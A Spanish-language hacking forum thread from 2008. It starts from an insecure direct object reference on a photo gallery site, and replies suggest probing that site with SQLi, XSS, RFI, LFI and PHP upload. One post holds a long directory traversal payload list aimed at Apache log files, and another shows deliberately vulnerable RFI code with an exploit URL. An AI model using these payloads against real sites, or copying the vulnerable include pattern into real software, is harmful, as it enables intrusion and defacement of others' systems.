Tema destacado: Recuperar cuenta de Google, GMail, Youtube
 Autor
|
Tema: Como explotar bugs de permisos (Leído 6,050 veces)
|
SpiderNet
 Desconectado
Mensajes: 149
No abuses de tus conocimientos
|
En la red encontre una web de galería, de esas de guardar fotos. Esta web tiene un sistema de registro de usuarios. Para poder subir las fotos debes loguearte, igualmente a la hora de modificarlas o eliminarlas. Lo cierto es que cuando modifique la descripcion de una de mis fotos, vi en la barra del navegador algo como... http://www.webgaleria/modificaimagen.php?codfoto=267Entonces en el navegador copie lo mismo pero le cambie los numeros que es de suponerse es el codigo interno de la foto. Y la web me mostro una foto de otro usuario y podia modificarla o eliminarla desde las opciones de la web. Asi puedo ir colocando diferentes numeros y me mostrara mas fotos. Ahora bien. Este bug es grave, pienso yo. Que peligro corre esta web. Y de que manera podrian tomar el control de ella o defacearla??? Saludos!!! P.D. Cambia los datos reales de la web. La de arrriba es solo un ejemplo. |
|
|
|
« Última modificación: 3 Diciembre 2008, 09:13 por sirdarckcat »
|
En línea
|
|
|
|
Eazy
Desconectado
Mensajes: 229
Eazy [FM-Team]
|
AHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAH eso no es un buggg  ahaha |
|
|
|
|
En línea
|
  [/url] |
|
|
oPen syLar
Desconectado
Mensajes: 686
The Best of You..
|
AHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAH eso no es un buggg ahaha  porque dices que no es un bug...? Spider la web podria decirte que la haz borrado... pero en verdad.. lo hace..??
|
|
|
|
|
En línea
|
|
|
|
SpiderNet
Desconectado
Mensajes: 149
No abuses de tus conocimientos
|
http://es.wiktionary.org/wiki/bug1 En Informática, Error o anomalía en el código de un programa informático Es que tu crees que esa Web fue diseñada para que un usuario pueda borrar los registros de otro??? Es obvio que no. Por lo tanto es un error en el código. Si alguien conoce los riesgos que corre esa web por favor informelo. Saludos!!!
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
Intentaste romper el flujo con mas datos? /modificaimagen.php?codfoto=[XSS, SQLi, RFI, LFI, Traversal, etc etc]
-berz3k. |
|
|
|
|
En línea
|
|
|
|
s E t H
Desconectado
Mensajes: 151
Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.
|
Si alguien conoce los riesgos que corre esa web por favor informelo.
Saludos!!!
corre riesgo de que alguien borre las fotos de otro xD proba lo que dijo berz3k, y tambien fijate si podes subir un php en lugar de una imagen
|
|
|
|
|
En línea
|
|
|
|
Eazy
Desconectado
Mensajes: 229
Eazy [FM-Team]
|
Berz3k, me explicas un poco lo de Transversal?
|
|
|
|
|
En línea
|
[/url] |
|
|
|
berz3k
|
Directory Traversal, mediante un fuzzer o manualmente, intentar "recorrer" directorios (relativos o no relativos), para encontrar y/o alcanzar archivos del propio filesystem ademas de leer archivos de la propia configuracion. e.g. "../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
-berz3k.
|
|
|
|
|
En línea
|
|
|
|
Azielito
no es
CoAdmin
Desconectado
Mensajes: 9.114
>.<
|
entonces, es diferente LFI a Directory Traversal? o ando mesclando conceptos?
|
|
|
|
|
En línea
|
|
|
|
Eazy
Desconectado
Mensajes: 229
Eazy [FM-Team]
|
ahhh, gracias berz3k,
@Azielito: Creo yo uqe si, LFI es meter un archivo que ejecute php (en este caso una shell podria ser) usando un uploader (ejemplo, "Sube tu foto")
Pero con Directory Traversal, que se puede hacer osea, qe seria lo mas potente qe se haria, leer algun pw algo?
|
|
|
|
|
En línea
|
[/url] |
|
|
Azielito
no es
CoAdmin
Desconectado
Mensajes: 9.114
>.<
|
ahora entiendo '_'
voy a hacer una aplicacion vulnerable para practicar xD
|
|
|
|
|
En línea
|
|
|
|
Eazy
Desconectado
Mensajes: 229
Eazy [FM-Team]
|
Azielito, yo tengo una aplicacion vulnerable si necesitas me avisas.
|
|
|
|
|
En línea
|
[/url] |
|
|
NaSaRiD15
Desconectado
Mensajes: 337
..Si habra para aprender..
|
A mi me interesa Eazy, tambien ando con ganas de practicar estos temas.
Saludos.
|
|
|
|
|
En línea
|
Hay que tomarse un tiempo para comprender que solamente sos lo que sos, de ahi a todo lo que tu kieras ser, eso ya depende de vos...
|
|
|
Eazy
Desconectado
Mensajes: 229
Eazy [FM-Team]
|
Bueno para hacer una aplicacion vulnerable a RFI tienen que poner: <?
Include($eazy);
?>
Que pasa? Si la variable Eazy no esta definida? esto hace que nosotros podamos incluir cualquier cosa. Por que? Por que al estar indefinida en el php, podemos definirla nosotros mismos desde el explorador. Como? Hariamos.. www.mihosting.com/archivovulnerable.php?eazy=http://google.com con lo que el codigo php que ejecute la web seria: <?
Include($eazy);
?>
Despues hago una breve explicacion de LFI, y una aplicacion vulnerable en mi host, suerte. |
|
|
|
|
En línea
|
[/url] |
|
|
|
|
|
 |
, bueno, creo que deberian meter en wargames o aqui mismo unas cuantas paginas vulnerables, y un tutorial de todo tipo de ataques PHP y SQL, gracias de todas formas por los datos.
